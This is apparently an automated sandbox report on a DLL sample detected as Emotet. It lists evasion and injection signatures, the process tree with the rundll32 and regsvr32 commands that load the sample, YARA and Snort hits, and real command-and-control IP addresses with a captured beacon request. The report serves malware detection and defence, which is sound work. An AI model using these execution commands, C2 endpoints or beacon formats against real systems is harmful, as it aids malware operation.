Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yj81rxDZIp.dll

Overview

General Information

Sample Name:yj81rxDZIp.dll
Analysis ID:626482
MD5:4f1cdae4390ecb862267f2eaaf826c74
SHA1:082de69d51991350ddfc05350073a55571c3ce5d
SHA256:c4e2c26fd37189447fcd387393974199933fdbffaadf2faaaac5347d1b0a8ef5
Tags:exetrojan
Infos:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Query firmware table information (likely to detect VMs)
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6396 cmdline: loaddll64.exe "C:\Users\user\Desktop\yj81rxDZIp.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6404 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6424 cmdline: rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • regsvr32.exe (PID: 6536 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NaMuLvbxXsNvT\LkWax.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 6412 cmdline: regsvr32.exe /s C:\Users\user\Desktop\yj81rxDZIp.dll MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 6440 cmdline: rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6488 cmdline: rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6584 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6620 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6752 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6892 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6924 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6992 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5784 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3280 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000003.00000002.280535060.0000026800000000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000002.00000002.277397167.0000000001FD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.280399426.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.198952a0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.26800000000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.26800000000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  2.2.regsvr32.exe.1fd0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    6.2.regsvr32.exe.12f0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.5150.95.66.1244977580802404312 05/14/22-04:33:59.725234
                      SID:2404312
                      Source Port:49775
                      Destination Port:8080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: yj81rxDZIp.dllVirustotal: Detection: 35%Perma Link
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49746 version: TLS 1.2
                      Source: yj81rxDZIp.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.662014992.0000000000F35000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.662014992.0000000000F35000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.5:49775 -> 150.95.66.124:8080
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: PukgQ=fwT4jaWVXqy4FOPB16oF0T0i4Guh1rTeK46tPoYmMLU5jQJ2MP23iyeG23+aT2mppqe1SJ9h0NOytVHHb8WQxKPBWOrm+6NjR4uMnT5B/uDGQqh07xpdP9VxB+0aWEwwI7Dfj0bukq5mxXTBlziLQo7sgFudvOrhO8nHOvcJ3Yar8tI3U7SqI0HqiYLS9K9Umccxh2TITUrJPQ7dQFwEkgCTvmJOraCJo7ZdZWWbPXR6m3nIWr9dKCNlVFVxN8p+zSBKwb2tl4PP7v+OCx/66c3C7sIrrIRyEuZBo4MxgcZG9pgpyTA=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 0000001F.00000003.529506802.000002B243972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000001F.00000003.529506802.000002B243972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000001F.00000003.529519637.000002B243983000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.529506802.000002B243972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001F.00000003.529519637.000002B243983000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.529506802.000002B243972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000002.664724806.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350907187.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.611006767.000001C89A263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.663292812.0000025190CE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.587747377.000002B243900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000010.00000002.611006767.000001C89A263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.583772838.000002B2430EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000A.00000002.326665159.00000178ADE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comx
                      Source: svchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000003.350891510.0000000001393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664633981.0000000001396000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350871227.0000000001381000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664487590.0000000001362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350949690.0000000001396000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350856165.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: svchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.326254922.00000178ADE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.326959683.00000178ADE69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000002.326816626.00000178ADE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326361500.00000178ADE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000002.326816626.00000178ADE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326361500.00000178ADE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.326875966.00000178ADE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000001F.00000003.553786728.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.326875966.00000178ADE5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326297933.00000178ADE5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.326835488.00000178ADE4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.326341898.00000178ADE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.326273805.00000178ADE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.326774545.00000178ADE3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.304670979.00000178ADE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000001F.00000003.549191071.000002B2439BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549211947.000002B243E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.550569503.000002B243986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549162134.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549145014.000002B2439D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.549110590.000002B243999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
